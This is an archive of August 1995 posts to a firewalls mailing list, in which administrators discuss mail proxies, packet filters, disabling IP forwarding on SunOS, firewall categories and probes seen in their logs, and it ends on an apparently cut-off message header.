sma023115; Tue Aug 8 00:19:07 1995 Received: from cnps.lss.cp.philips.com ([130.144.198.1]) by relay.philips.nl (8.6.9/8.6.9-950414) with SMTP id JAA16124; Tue, 8 Aug 1995 09:17:43 +0200 Received: from spooky.lss.cp.philips.com by cnps.lss.cp.philips.com with smtp (Smail3.1.28.1 #1) id m0sfjwD-0000rMC; Tue, 8 Aug 95 09:23 MET Received: by spooky.lss.cp.philips.com (Smail3.1.29.1 #1) id m0sfiri-000HneC; Tue, 8 Aug 95 09:14 MET DST Message-Id: From: guido@spooky.lss.cp.philips.com (Guido van Rooij) Subject: Re: smap with ESMTP size extension To: seth@soscorp.com (Seth Robertson) Date: Tue, 8 Aug 1995 09:14:18 +0200 (MET DST) Cc: guido@spooky.lss.cp.philips.com, firewalls@greatcircle.com In-Reply-To: <199508072056.QAA13038@dauntless.soscorp.com> from "Seth Robertson" at Aug 7, 95 04:56:49 pm Reply-To: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij) X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 489 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Seth Robertson wrote: > > > Freestone's (and obviously Brimstone's) mail proxy supports ESMTP with > the size extension. It thus also allows you to place administrative > limits on maximum message size and the minimum amount of free disk > space that must be maintained. > I am aware of that. But when I tried building it I found myself taking in so many other libs...Further the docs are much too minimal (absent is a better word). So I extended smap with ESMTP (only SIZE). -Guido From firewalls-owner Tue Aug 8 02:00:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25790 for firewalls-outgoing; Tue, 8 Aug 1995 01:40:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25775 for ; Tue, 8 Aug 1995 01:39:59 -0700 Received: from gateway.ps.net(192.131.85.2) by miles via smap (V1.3) id sma025770; Tue Aug 8 01:39:18 1995 Received: from uhea001.gb.ec.ps.net by gateway.ps.net with SMTP id AA02849 (InterLock SMTP Gateway 3.0 for ); Tue, 8 Aug 1995 03:37:59 -0500 Message-Id: <199508080837.AA02849@gateway.ps.net> To: firewalls@greatcircle.com Date: Tue, 8 Aug 1995 09:38:04 +0100 (BST) From: "frosta" X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 19 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk suspend firewalls From firewalls-owner Tue Aug 8 02:17:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25538 for firewalls-outgoing; Tue, 8 Aug 1995 01:32:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25514 for ; Tue, 8 Aug 1995 01:32:41 -0700 Received: from gmap15.leeds.ac.uk(129.11.84.200) by miles via smap (V1.3) id sma025477; Tue Aug 8 01:31:43 1995 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id JAA22584 for ; Tue, 8 Aug 1995 09:25:55 +0100 Received: from gmap.leeds.ac.uk (gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id JAA12823 for ; Tue, 8 Aug 1995 09:30:21 +0100 From: Danny Cox Date: Tue, 8 Aug 1995 09:27:36 +0100 Message-Id: <6328.9508080827@gmap.leeds.ac.uk> To: firewalls@greatcircle.com Subject: klaxon X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subsequent to my request about which entries in /etc/services to keep I've downloaded and built klaxon to watch on unusual ports. I'm a little confused about how to use it though. I entered it in to my /etc/inetd.conf but perhaps I got this wrong. Does it generate daemon messages ? What status are they? I get no entries in my /var/log/syslog (Solaris 2.3 btw) at the minute, hence the previous questions. Thanks again, danny From firewalls-owner Tue Aug 8 02:34:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25872 for firewalls-outgoing; Tue, 8 Aug 1995 01:42:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25828 for ; Tue, 8 Aug 1995 01:41:59 -0700 Received: from yarrina.connect.com.au(192.189.54.17) by miles via smap (V1.3) id sma025817; Tue Aug 8 01:41:40 1995 Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id SAA03343 (8.6.12/IDA-1.6); Tue, 8 Aug 1995 18:40:17 +1000 Received: (proff@localhost) by suburbia.net (8.6.12/Miles-950430-1) id SAA20299; Tue, 8 Aug 1995 18:40:11 +1000 From: Julian Assange Message-Id: <199508080840.SAA20299@suburbia.net> Subject: Re: Sparc2 as a 3-way packet filter? To: detzel@medoc.medoc-ias.u-psud.fr (Vincent DETZEL) Date: Tue, 8 Aug 1995 18:40:10 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199508080716.JAA07877@medoc.medoc-ias.u-psud.fr> from "Vincent DETZEL" at Aug 8, 95 09:16:46 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 411 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > - as for ip-fil (ftp:coombs.anu.edu.au/pub/net/kernel/ip-fil2.7.3.tar.gz) > it appears to me that it begins to be widely choosed and as a matter of fact, > many changes applied on this package every week (last release dated : Aug 1). > > Does it mean that ip-fil is going to become much more efficient and fonctionnal than screend ? But you forget the most important reason. Avalog aza clue. -Proff From firewalls-owner Tue Aug 8 05:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA01275 for firewalls-outgoing; Tue, 8 Aug 1995 04:49:45 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA01267 for ; Tue, 8 Aug 1995 04:49:43 -0700 Received: from argo.hks.com(192.156.170.1) by miles via smap (V1.3) id sma001265; Tue Aug 8 04:49:14 1995 Received: from ragnarok.hks.com (ragnarok.hks.com [192.101.199.9]) by argo.hks.com (8.6.12/8.6.12) with ESMTP id LAA10347; Tue, 8 Aug 1995 11:48:05 GMT Received: by ragnarok.hks.com (940816.SGI.8.6.9/940406.SGI) id HAA07224; Tue, 8 Aug 1995 07:48:04 -0400 From: "Jim Littlefield" Message-Id: <9508080748.ZM7222@ragnarok.hks.com> Date: Tue, 8 Aug 1995 07:48:03 -0400 In-Reply-To: millar@pobox.upenn.edu (Dave Millar) "Host protection with ipfilterd?" (Aug 7, 5:02pm) References: <199508072102.RAA01174@pobox.upenn.edu> X-Mailer: Z-Mail (3.2.1 15feb95) To: millar@pobox.upenn.edu (Dave Millar), firewalls@GreatCircle.COM Subject: Re: Host protection with ipfilterd? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Aug 7, 5:02pm, Dave Millar wrote: : Someone has asked me if it is appropriate to use ipfilterd to filter access : to their SGI host residing on a campus subnet. My take on it is that : ipfilterd is appropriate if you want to dedicate your SGI as a router to : filter packets between an internal subnet and an external network/subnet, : but that it is not the right tool for protecting the SGI host *itself*. : Seems to me like tcp wrappers and portmapper are the proper tools for : host-based filtering (with the caveat that such filtering is not as : comprehensive or flexibled as router-based packet filtering, can only : address filtering services "mediated" through either inetd or rpc, and : therefore can not address filtering other services such as UDP, ICMP, etc.) : : I assume the same would hold true for screend as well. : : Am I on the right track, here? I can't say that I like everything ipfilterd does or does not do (ask SGI ;), but you can filter based on incoming interface which does permit you to proect the firewall itself. Of course, tcp_wrappers, fwtk, etc. are all necessities, also. -- Jim Littlefield "That's no ordinary rabbit, that's the most foul, cruel and bad-tempered rodent you ever set eyes on!" - Tim, Monty Python's The Holy Grail From firewalls-owner Tue Aug 8 05:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA01361 for firewalls-outgoing; Tue, 8 Aug 1995 05:02:46 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA01353 for ; Tue, 8 Aug 1995 05:02:43 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma001347; Tue Aug 8 05:02:23 1995 Received: from relay.tis.com by neptune.TIS.COM id aa05237; 8 Aug 95 8:00 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma026863; Tue, 8 Aug 95 07:51:37 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA13667; Tue, 8 Aug 95 07:58:57 EDT Message-Id: <9508081158.AA13667@tis.com> From: Frederick M Avolio X-Organization: Trusted Information Systems, Inc. X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363 To: CASSIDY MEYER Cc: firewalls@greatcircle.com Subject: Re: iWay-One In-Reply-To: Your message of Tue, 08 Aug 95 08:18:08 +0200. <187A644343@cncjnk.wcape.gov.za> Date: Tue, 08 Aug 95 07:58:57 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There was going to be an Internet Firewalls Symposium, to be held in Dallas. But when all of the vendors who had a firewall registered, it was found that there was no room left in Dallas hotels for attendees. I am joking. f From firewalls-owner Tue Aug 8 08:00:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04019 for firewalls-outgoing; Tue, 8 Aug 1995 07:01:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04011 for ; Tue, 8 Aug 1995 07:01:26 -0700 Received: from soscorp.soscorp.com(204.52.248.130) by miles via smap (V1.3) id sma003998; Tue Aug 8 07:00:24 1995 Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com (2.28/8.6.12/8.6.4.287) with BSMTP id BS0018086/JAA18091; Tue, 8 Aug 1995 09:59:03 -0400 Received: from dauntless.soscorp.com (dauntless.soscorp.com [204.52.249.141]) by fearless.soscorp.com (8.6.10/8.6.4.287) with ESMTP id JAA19435; Tue, 8 Aug 1995 09:58:20 -0400 Received: from dauntless.soscorp.com by dauntless.soscorp.com (8.6.10/SMI-4.1) id JAA14521; Tue, 8 Aug 1995 09:58:18 -0400 Message-Id: <199508081358.JAA14521@dauntless.soscorp.com> To: bobb@ns1.infonautics.com cc: firewalls@greatcircle.com In-Reply-To: <199508080021.RAA19137@translation.com> Subject: Re: using suns/sunos for gateway host(s) Date: Tue, 08 Aug 1995 09:58:13 -0400 From: Seth Robertson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <199508080021.RAA19137@translation.com>, Andrew Foss wrote: >adb -k -w /vmunix /dev/mem >ip_forwarding?x (if this returns 01 it's on) >ip_forwarding/w 0 (turns it off in /dev/mem, your running image) >ip_forwarding?w 0 (turns it off in /vmunix so it'll be off next reboot) >^d (exits adb) In SunOS, you need to change the value to -1, not zero. If the value is zero, it will be set to one for you if SunOS thinks there are two interfaces on the machine. Even -1 will not prevent *some* IP forwarding from taking place--if it thinks the packet is source routed and is going out the same interface it came in, then the packet will be forwarded. Solaris has this same ``feature'' regarding ip_forwarding being disregarded under these circumstances. (I am given to understand this is to support Solaris's ping -l.) You also should worry about source routing and ICMP redirects. In SunOS, you cannot disable them via kernel variables. Sigh. ---- Seth Robertson voice: +1 800 SOS UNIX +1 212 686 5700 SOS Corporation fax: +1 212 686 5703 461 5th Avenue, 16th floor email: seth@soscorp.com New York, NY 10017 http://www.soscorp.com/ From firewalls-owner Tue Aug 8 08:44:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04096 for firewalls-outgoing; Tue, 8 Aug 1995 07:04:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04077 for ; Tue, 8 Aug 1995 07:04:26 -0700 From: harley@acs.bu.edu Received: from acs.bu.edu(128.197.152.10) by miles via smap (V1.3) id sma004073; Tue Aug 8 07:04:21 1995 Received: by acs.bu.edu (8.6.11/BU_SmartClient-1.0) id KAA128888; Tue, 8 Aug 1995 10:01:32 -0400 Date: Tue, 8 Aug 1995 10:01:32 -0400 Message-Id: <199508081401.KAA128888@acs.bu.edu> To: firewalls@greatcircle.com Subject: Firewall categorization Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Folks: Please excuse some basic questions from a newbie, but: Many people (including Cheswick and Bellovin) describe three different categories of firewalls: packet-filtering gateways, application-level gateways, and circuit-level gateways. Would a typical Cisco with access control lists and TACACS+ be considered a packet-filtering gateway? Which category does Firewall-1 fit into? The trade press continually paints them as a packet-filter but CheckpointÕs marketing folks have taken pains to distance themselves from this label. How about LivingstonÕs Firewall IRX? Network Systems NetSentry? Finally, what are some examples of a circuit-level gateway? IBMÕs NetSP? Others? Thnaks in advance. From firewalls-owner Tue Aug 8 08:45:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04064 for firewalls-outgoing; Tue, 8 Aug 1995 07:03:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04044 for ; Tue, 8 Aug 1995 07:03:26 -0700 Received: from dg-rtp.rtp.dg.com(128.222.1.2) by miles via smap (V1.3) id sma004040; Tue Aug 8 07:02:40 1995 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA06350; Tue, 8 Aug 1995 10:01:03 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA24229; Tue, 8 Aug 1995 10:01:00 -0400 Message-Id: <9508081401.AA24229@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com Date: Tue, 8 Aug 1995 10:00:04 -0500 Subject: Re: InfoSec policies made easy? Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rumour has it that on 4 Aug 95 at 15:18, Jim Carroll said: > I was cleaning up around my desk when I came across a promo entitled > "Information Security Policies Made Easy". Dang near forgot about > this. I'll forward noteworthy points for comment: Got lots of "please e-mail" and "please post" messages, so here are the lewd detail$: Title: Information Security Policies Made Easy Author: Charles Cresson Wood Price: $495.00 (this price may not be current) Vendor: Baseline Software PO Box 1219 Sausalito, California 94966 USA Phone: 800-829-9955 (USA/Canada) 415-332-7763 Fax: 415-332-8032 NB: If this information is no longer current, don't followup to me. You now know as much as I do about finding out how to get the book. DISCLAIMER: I do not sell the book, nor do I work for Mr. Wood or for Baseline Software. I've never met them, I've never spoken with them, I've never faxed them, I've never sent them any mail. This is not to say that I won't buy the book. ;) -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## The more I learn, the less I know. ## ## Eventually I'll know everything about nothing. ## From firewalls-owner Tue Aug 8 08:45:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04351 for firewalls-outgoing; Tue, 8 Aug 1995 07:16:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04343 for ; Tue, 8 Aug 1995 07:16:26 -0700 From: harley@acs.bu.edu Received: from acs.bu.edu(128.197.152.10) by miles via smap (V1.3) id sma004341; Tue Aug 8 07:16:14 1995 Received: by acs.bu.edu (8.6.11/BU_SmartClient-1.0) id KAA141668; Tue, 8 Aug 1995 10:11:51 -0400 Date: Tue, 8 Aug 1995 10:11:51 -0400 Message-Id: <199508081411.KAA141668@acs.bu.edu> To: firewalls@greatcircle.com Subject: Firewall categorization Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please excuse some basic questions from a newbie, but: Many people (including Cheswick and Bellovin) describe three different categories of firewalls: packet-filtering gateways, application-level gateways, and circuit-level gateways. Would a typical Cisco with access control lists and TACACS+ support be considered a packet-filtering gateway? Which category does Firewall-1 fit into? The trade press continually paints them as a packet-filter but Checkpoint's marketing folks have taken pains to distance themselves from this label. How about Livingston's Firewall IRX? Network System's NetSentry? Are all these products in the same category? Finally, what are some examples of a circuit-level gateway? IBM's NetSP? Others? Thanks! From firewalls-owner Tue Aug 8 09:03:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04334 for firewalls-outgoing; Tue, 8 Aug 1995 07:15:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04319 for ; Tue, 8 Aug 1995 07:15:26 -0700 From: Ruiyuan_Jiang/Advantage_KBS_at_LotusXchg@njcorp.akbs.com Received: from netcom11.netcom.com(192.100.81.121) by miles via smap (V1.3) id sma004315; Tue Aug 8 07:15:20 1995 Received: from njcorp.akbs.com by netcom11.netcom.com (8.6.12/Netcom) id HAA15972; Tue, 8 Aug 1995 07:12:11 -0700 Received: from cc:Mail by njcorp.akbs.com id AA807902096; Tue, 08 Aug 95 10:14:00 EST Date: Tue, 08 Aug 95 10:14:00 EST Encoding: 16 Text Message-Id: <9507088079.AA807902096@njcorp.akbs.com> To: firewalls@greatcircle.com Subject: Test Methodology of Internet Firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I just setup my internet firewall. I have a question how to effectively test my firewall whether it works ok or not. Since I am not an internet hacker, I don't know how to test it. I know I can try to ftp, telnet some hosts in my internal LAN using my account which I got when I was a student from the university. Besides these standard method, are there any more efficient way to test? Thanks in advance. Ruiyuan Jiang System Administrator ADVANTAGE kbs, Inc. rjiang@akbs.com Lotus Notes Business Partner HP-UX Business Partner (908) 287-2236 FAX (908) 287-3193 From firewalls-owner Tue Aug 8 09:30:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA05211 for firewalls-outgoing; Tue, 8 Aug 1995 07:43:41 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA05195 for ; Tue, 8 Aug 1995 07:43:39 -0700 Received: from unknown(151.190.1.25) by miles via smap (V1.3) id sma005192; Tue Aug 8 07:42:56 1995 Date: Tue, 8 Aug 1995 10:28:38 -0400 Message-Id: <95080810283812@odo.acdnj.itt.com> From: nabadm@odo.acdnj.itt.com (set chaos/total) To: firewalls@greatcircle.com Subject: NISPOM availability X-VMS-To: SMTP%"firewalls@GreatCircle.com" X-VMS-Cc: NABADM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For those of you who have asked where to get your own copy of the NISPOM: I got my copy from my company's Industrial Security department. They in turn received it from our friendly local DIS (Defense Investigative Service) reps. So if you are a government contractor your company should already have a copy of this document. If you are not a government contractor but into pain nonetheless, I would think that you should be able to get a copy from the government printing office. I believe the document number is Dod 5220.22-M. The manual is entitled "National Industry Security Program Operating Manual" and is dated January 1 1995. If you are interested in this document as a template for some sort of security policy I think you will be very disappointed. It is targetted to a very specific environment. Only one (short, 20 page) chapter deals with computer and network security. Aside from the clearing and sanitization matrix there is a dearth of technical computer information. Since there are copies of the Orange Book et al on the net I will see if I can find an electronic copy of the NISPOM. ------------------------------------------------------------------------------- "Crisis over, back to panic mode!" ------------------------------------------------------------------------------- N.A. Bogart nabadm@odo.acdnj.itt.com OpenVMS & Security Systems Manager bogart@itt.com ITT Avionics (201) 284-5117 VOICE(MAIL) 100 Kingsland Road (201) 284-3947 FAX Clifton NJ 07014 (201) 730-2681 PAGER ------------------------------------------------------------------------------- From firewalls-owner Tue Aug 8 10:05:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09263 for firewalls-outgoing; Tue, 8 Aug 1995 09:40:32 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09192 for ; Tue, 8 Aug 1995 09:40:23 -0700 Received: from edison.eng.auburn.edu(131.204.10.13) by miles via smap (V1.3) id sma009117; Tue Aug 8 09:39:32 1995 Received: from netman.eng.auburn.edu (20663@netman.eng.auburn.edu [131.204.12.24]) by edison.eng.auburn.edu (8.6.12/8.6.4) with ESMTP id LAA19699; Tue, 8 Aug 1995 11:38:04 -0500 From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id LAA10216; Tue, 8 Aug 1995 11:38:02 -0500 Date: Tue, 8 Aug 1995 11:38:02 -0500 Subject: Re: klaxon To: dannyc@gmap.leeds.ac.uk Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: <6328.9508080827@gmap.leeds.ac.uk> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It sends out messages at auth.notice. Your syslog.conf should use this facility.level to do what you want with them. You can also change it easily in the source in two places. (where it says LOG_AUTH|LOG_NOTICE) If you have any more usage questions, you're probably best off asking me directly, since usage of it is not yet what you would call wide-spread. :) -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu "Real programmers use cat > file.as" From firewalls-owner Tue Aug 8 10:33:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA08841 for firewalls-outgoing; Tue, 8 Aug 1995 09:33:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA08807 for ; Tue, 8 Aug 1995 09:33:14 -0700 Received: from rye.city.ac.uk(138.40.11.7) by miles via smap (V1.3) id sma008765; Tue Aug 8 09:32:19 1995 Received: from mnt-pleasant.city.ac.uk by rye.city.ac.uk with SMTP (PP) id <27301-0@rye.city.ac.uk>; Tue, 8 Aug 1995 17:30:43 +0100 Received: from euston (euston.city.ac.uk [138.40.41.1]) by mnt-pleasant.city.ac.uk (8.6.12/8.6.12) with SMTP id RAA01667; Tue, 8 Aug 1995 17:30:40 +0100 Date: Tue, 8 Aug 1995 17:28:09 +0100 (BST) From: David Brownlee X-Sender: sh391@euston To: Seth Robertson cc: bobb@ns1.infonautics.com, firewalls@greatcircle.com Subject: Re: using suns/sunos for gateway host(s) In-Reply-To: <199508081358.JAA14521@dauntless.soscorp.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you're not comitted to SunOS, you could always put a BSD variant (ie NetBSD) on the machine - that should do what you need pretty much out of the box (& its free :) David D.K.Brownlee@city.ac.uk (MIME) +44 171 477 8186 {post,host}master (abs) Network Analyst, UCS, City University, Northampton Square, London EC1V 0HB. <<< Monochrome - Largest UK Internet BBS - telnet mono.city.ac.uk >>> On Tue, 8 Aug 1995, Seth Robertson wrote: > > In article <199508080021.RAA19137@translation.com>, > Andrew Foss wrote: > > >adb -k -w /vmunix /dev/mem > >ip_forwarding?x (if this returns 01 it's on) > >ip_forwarding/w 0 (turns it off in /dev/mem, your running image) > >ip_forwarding?w 0 (turns it off in /vmunix so it'll be off next reboot) > >^d (exits adb) > > In SunOS, you need to change the value to -1, not zero. > > If the value is zero, it will be set to one for you if SunOS thinks > there are two interfaces on the machine. Even -1 will not prevent > *some* IP forwarding from taking place--if it thinks the packet is > source routed and is going out the same interface it came in, then the > packet will be forwarded. Solaris has this same ``feature'' regarding > ip_forwarding being disregarded under these circumstances. (I am > given to understand this is to support Solaris's ping -l.) > > You also should worry about source routing and ICMP redirects. In > SunOS, you cannot disable them via kernel variables. > > Sigh. > > ---- > Seth Robertson voice: +1 800 SOS UNIX +1 212 686 5700 > SOS Corporation fax: +1 212 686 5703 > 461 5th Avenue, 16th floor email: seth@soscorp.com > New York, NY 10017 http://www.soscorp.com/ > From firewalls-owner Tue Aug 8 11:39:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15626 for firewalls-outgoing; Tue, 8 Aug 1995 11:29:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15583 for ; Tue, 8 Aug 1995 11:29:53 -0700 Received: from hydra.msgi.com(192.233.14.117) by miles via smap (V1.3) id sma015570; Tue Aug 8 11:29:22 1995 Received: from heimdall (heimdall [192.233.14.113]) by msgi.com (8.6.9/8.6.6) with SMTP id OAA26919; Tue, 8 Aug 1995 14:28:48 -0400 Date: Tue, 8 Aug 1995 14:35:25 -0900 (PDT) From: Morgan Stair To: firewalls@greatcircle.com, bblisa@bblisa.org Subject: Phone numbers X-Sender: morgan@hydra Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know the phone numbers for these router companies. I'm still trying to straighten out our firewall / filtering situation! I'm looking for a good router with 1 ISDN plug and 2 ethernet plugs which can filter among the 3. MorningStar Tech doesn't do ISDN yet. Livingston Cisco Protean Thanks! Morgan ------------------------------------------------------------------------------- Morgan Stair MSGmass, Inc. Email: Morgan@MSGI.com Software Engineer 20 Blanchard Rd, Suite 11A Phone: (617) 272-8665 Burlington MA, 01803 Fax: (617) 272-0428 ------------------------------------------------------------------------------- From firewalls-owner Tue Aug 8 13:36:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA19970 for firewalls-outgoing; Tue, 8 Aug 1995 12:34:55 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA21958 for ; Mon, 7 Aug 1995 23:51:21 -0700 Message-Id: <199508080651.XAA21958@miles.greatcircle.com> Received: from studm.tofs.ac.za(198.54.58.2) by miles via smap (V1.3) id sma021946; Mon Aug 7 23:50:42 1995 Received: by studm.tofs.ac.za (1.37.109.4/16.2) id AA14120; Tue, 8 Aug 95 08:47:47 +0200 From: DJ Kotze (Technikon OFS) Subject: HELP - unwanted firewall To: firewalls@GreatCircle.com Date: Tue, 8 Aug 95 8:47:46 SAST Mailer: Elm [revision: 70.85] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need assistace in turning a HP F30 acting like a firewall into one acting as a router. To balance network traffic (most directed at the HP F30 with IP 198.54.48.2), we installed a second interface for the net 196.10.119.0. Previously the senario was ----------------------------------198.54.58.0 >> internet ^ ^ 198.54.58.2 196.10.119.0 ^ 196.13.191.0 This was changed to -------------------------------198.54.58.0 >> internet ^ ^ 198.54.58.2 /(F30) 196.10.119.70 / ^ 196.10.119.0 ^ 196.13.191.0 >From the F30 I can ping and see all networks. from other machines (as well as internet) only the 198.54.58.0 network is visible. The route to all the 196 networks (on 2ND interface is not advertised). I have used route to add the following routes as static 196.10.119.0 196.10.119.70 U 196.13.191.0 196.10.119.69 UG (the last is router to 196.13.191.0) and have tried to configure gated.conf - obviously not correctly. I am including a copy of gated.conf - please advise urgently # gated routing daemon configuration info # rip on { }; hello on { }; egp off { }; static { default gateway 198.54.58.4 preference 255; }; # Announce our default gateway # # propagate proto rip { proto static { announce default; }; }; accept proto rip {}; propagate proto rip { proto rip { announce all; }; }; Thanks Dana Kotze Dana@studm.tofs.ac.za 196.13.191.0 ^ -- ************************************************************ * D J Kotze Department Information Technology * * +27-51-4073096 Technikon OFS - South Africa * * dana@studm.tofs.ac.za * ************************************************************ From firewalls-owner Tue Aug 8 13:38:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA17868 for firewalls-outgoing; Tue, 8 Aug 1995 12:03:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA17808 for ; Tue, 8 Aug 1995 12:02:56 -0700 Received: from intfw.bear.com(206.25.172.66) by miles via smap (V1.3) id sma017794; Tue Aug 8 12:02:22 1995 Received: by intfw.bear.com (4.1/SMI-4.1) id AA19507; Tue, 8 Aug 95 15:00:01 EDT Received: from fastbear(165.168.74.3) by intfw via smap (V1.3) id sma019482; Tue Aug 8 14:58:04 1995 Received: from ursa2.bear.com by fastbear.bear.com (4.1/SMI-4.1/1.0 AMR 12/15/94) id AA06384; Tue, 8 Aug 95 14:59:20 EDT Received: from jake by ursa2.bear.com (4.1/SMI-4.1/JMD+AMR+DJS) id AA09408; Tue, 8 Aug 95 14:58:47 EDT Message-Id: <9508081858.AA09408@ursa2.bear.com> Received: by jake (1.37.109.16/16.2) id AA189868327; Tue, 8 Aug 1995 14:58:47 -0400 Date: Tue, 8 Aug 1995 14:58:47 -0400 From: Ari Rabinowitz To: firewalls@greatcircle.com Subject: What is on port 5654? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, We recently got a live connection to the Internet and I have been looking through the firewall logs. I noticed a few random telnet and finger attempts which I am ignoring for now (mostly from .edu sites). I also noticed a few attempts to access port 5654 from sparcy.euro.net which seems to be in Amsterdam. Does anyone know what they expect to find on 5654? Is there anyone I should try to report these attempts to? Any suggestions would be welcome. Thanks, Ari -- Ari Rabinowitz, VP ari@bear.com Workstation Administrator, Postmaster, and Firewall watcher Bear Stearns & Co. Inc. -- ******************************************************************************* Bear Stearns is not responsible for any recommendation, solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication. ******************************************************************************* From firewalls-owner Tue Aug 8 14:01:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23388 for firewalls-outgoing; Tue, 8 Aug 1995 13:52:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23335 for ; Tue, 8 Aug 1995 13:52:00 -0700 Received: from blackhole.eas.asu.edu(129.219.31.171) by miles via smap (V1.3) id sma023325; Tue Aug 8 13:51:56 1995 Received: (from yhartojo@localhost) by blackhole.eas.asu.edu (8.6.12/8.6.9) id NAA01048 for firewalls@greatcircle.com; Tue, 8 Aug 1995 13:51:51 -0700 From: Francis Hartojo Message-Id: <199508082051.NAA01048@blackhole.eas.asu.edu> Subject: IP filtering package on Solaris 2.x. To: firewalls@greatcircle.com 